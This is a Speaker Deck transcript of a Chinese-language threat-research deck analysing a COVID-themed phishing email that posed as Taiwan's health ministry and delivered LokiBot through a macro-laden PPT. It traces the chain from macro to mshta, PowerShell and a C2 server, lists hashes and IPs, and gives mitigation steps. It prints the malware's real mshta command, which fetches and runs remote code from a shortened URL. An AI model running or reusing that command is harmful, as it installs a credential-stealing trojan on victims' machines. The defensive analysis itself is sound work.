Speaker Deck
Sign in
Sign up
for free
假冒衛福部部名義寄送含惡意程式之電子郵件樣本分析
ISSDU Threat Research
June 15, 2020
Research
0
1.2k
假冒衛福部部名義寄送含惡意程式之電子郵件樣本分析
ISSDU Threat Research
June 15, 2020
Tweet
Share
More Decks by ISSDU Threat Research
See All by ISSDU Threat Research
issdu
1
630
issdu
0
16
Other Decks in Research
See All in Research
sobamchan
1
410
ymas0315
0
100
racterub
0
120
chokkan
0
2.9k
cfiken
1
360
chokkan
1
3.2k
butsugiri
1
130
ttsunoda
0
620
hakubishin3
1
260
chokkan
0
2.6k
ritsu2891
0
200
rkrokee
0
140
Featured
See All Featured
sstephenson
144
12k
aarron
255
36k
jcasabona
7
470
tenderlove
49
3.3k
nonsquared
79
3.2k
lynnandtonic
267
16k
robhawkes
52
2.7k
lemiorhan
622
40k
davidbonilla
69
3.5k
mthomps
37
2.2k
smashingmag
227
17k
wjessup
336
16k
Transcript
假冒衛福部部名義寄送含惡意 程式之電子郵件樣本分析 ISSDU Threat Research
Agenda • 樣本來源 • 樣本分析 • 樣本追蹤 • 結論與應處
樣本來源 ISSDU Threat Research
3 偽冒信件內容 • 研判該信件內容偽冒我國衛生福利部代理主任秘書”鄭舜平” • 信件署名為”台灣衛生部” ISSD U Threat R
esearch
4 寄件者追蹤 • 透過情資分享可發現到該信件寄件來源為”95.216.8.75”,為一芬蘭主 機商,研判為跳板主機 ISSD U Threat R esearch
5 樣本背景資訊 covid-19防护设备申请表.pot (VT: 27/62) • md5,D0ED831EE17E87FE82B1B203CF1C7405 • sha256,BA5C251F78A1D57B72901F4FF80824D6AD0AA4BF1931C5 93A36254DB4AB41021
Covid-19防护措施.ppt (VT: 27/62) • md5,D0ED831EE17E87FE82B1B203CF1C7405 • sha256,BA5C251F78A1D57B72901F4FF80824D6AD0AA4BF1931C5 93A36254DB4AB41021 ISSD U Threat R esearch
樣本分析 ISSDU Threat Research
7 行為分析(1) • 在VM中開啟PPT檔案,會詢問是否啟用巨集 ISSD U Threat R esearch
行為分析(2) • 從MDR後台可看到PPT執行後產生了”mshta.exe”以及來源為”檔案 瀏覽器(點擊開啟檔案)” ISSD U Threat R esearch
行為分析(3) • PPT產生的執行續”mshta”遭偵測為”Initial Access - Spearphishing Attachment – PowerPoint” ISSD
U Threat R esearch
行為分析(4) • 針對”mshta http://%20%20@j.mp/asdakdxassddodkasodkaos”進 行檔案分析 • 該檔案使用WSCRIPT下載並執行多個”pastebin.com”上的內容 ISSD U Threat
R esearch
行為分析(5) • 第二段的”mshta”被偵測為”Command And Control - Command Interpreter Suspicious Download”
ISSD U Threat R esearch
行為分析(6) • 該檔案經解碼後發現其透過”POWERSHELL”下載並執 行”pastebin.com”上面的檔案 ISSD U Threat R esearch
行為分析(7) • 接續前頁POWERSHELL分析可發現到該POWERSHLL行為讓多個行為規 則告警 ISSD U Threat R esearch
行為分析(8) • POWERSHELL呼叫”InstallUtil”回報中繼站” 198.23.200.239” ISSD U Threat R esearch
行為分析(9) • 分析中繼站連線封包可發現到會回傳主機名稱等資訊 ISSD U Threat R esearch
樣本分析(1) • Sha256 • 95322ABC2EB990F100D99A83 1A2779D298B75D2410727FA8 42CA0A85BA4907DA(VT:53/72) • LOKIBOT第一段組件: •
關閉Windows Defender • 關閉Office安全性 ISSD U Threat R esearch
樣本分析(2) • Sha256(主要以竊取各種軟體帳號密碼為主要功能) • B88F644115A4B4CAAAFBED310FB6B8E2E6FDDA500CD5F495A229 A0A75E65FB9F(VT:64/73) ISSD U Threat R
esearch
樣本追蹤 ISSDU Threat Research
中繼站追蹤 • 透過該中繼站IP可發現到VIRUSTOTAL上九十天內已發現”155”個相關 樣本 ISSD U Threat R esearch
樣本追蹤關聯(1) • 該樣本已遭知名線上沙箱網站判定為”Lokibot”家族 ISSD U Threat R esearch
樣本追蹤關聯(2) • 該樣本使用多階段下載並載入相關內容,關聯圖如下: ISSD U Threat R esearch
樣本追蹤關聯(3) • 該樣本以ATT&CK技術涵蓋階段如下: ISSD U Threat R esearch
Lokibot為知名網路犯罪使用病毒 • https://any.run/malware-trends/lokibot ISSD U Threat R esearch
斯洛維尼亞CERT於近期也發布相關告警 • https://www.cert.si/si-cert-2020-05-lazno-sporocilo-nijz/ ISSD U Threat R esearch
結論與應處 ISSDU Threat Research
偽裝成衛福部官員信件 95.216.8.75 (寄件來源) 1 MSHTA mshta http://%20%20@j. mp/asdakdxassddo dkasodkaos 4
POWERSHELL 下載並植入 pastebin.com 內容 5 回報中繼站 198.23.200.239 竊取帳號密碼 關閉資安防護 6 附件檔案為PPT Covid-19防护措施.ppt 2 使用巨集載入後續內容 3 攻擊流程摘整 ISSD U Threat R esearch
結論 • COVID-19期間國際間已發現許多依該題材進行的社交工程郵件攻擊 • 由於我方收到的郵件題材署名為”台灣衛生部”,研判非針對性攻擊 • 國外CERT組織也發布行為類似的惡意軟體告警,研判為大量散播的釣魚 攻擊 ISSD U
Threat R esearch
應處 • 阻擋中繼站 • 198[.]23[.]200[.]239 • 樣本送樣 • 將我方提供之樣本提供給防毒軟體廠商進行送樣 •
COVID-19期間都需要針對該類型題材提高警覺 ISSD U Threat R esearch
Thank You
issdu
sobamchan
ymas0315
racterub
chokkan
cfiken
butsugiri
ttsunoda
hakubishin3
ritsu2891
rkrokee
sstephenson
aarron
jcasabona
tenderlove
nonsquared
lynnandtonic
robhawkes
lemiorhan
davidbonilla
mthomps
smashingmag
wjessup
![應處 • 阻擋中繼站 • 198[.]23[.]200[.]239 • 樣本送樣 • 將我方提供之樣本提供給防毒軟體廠商進行送樣 •](https://files.speakerdeck.com/presentations/de960472fadc437588f8b2d29544f0f4/slide_28.jpg){kind=link}
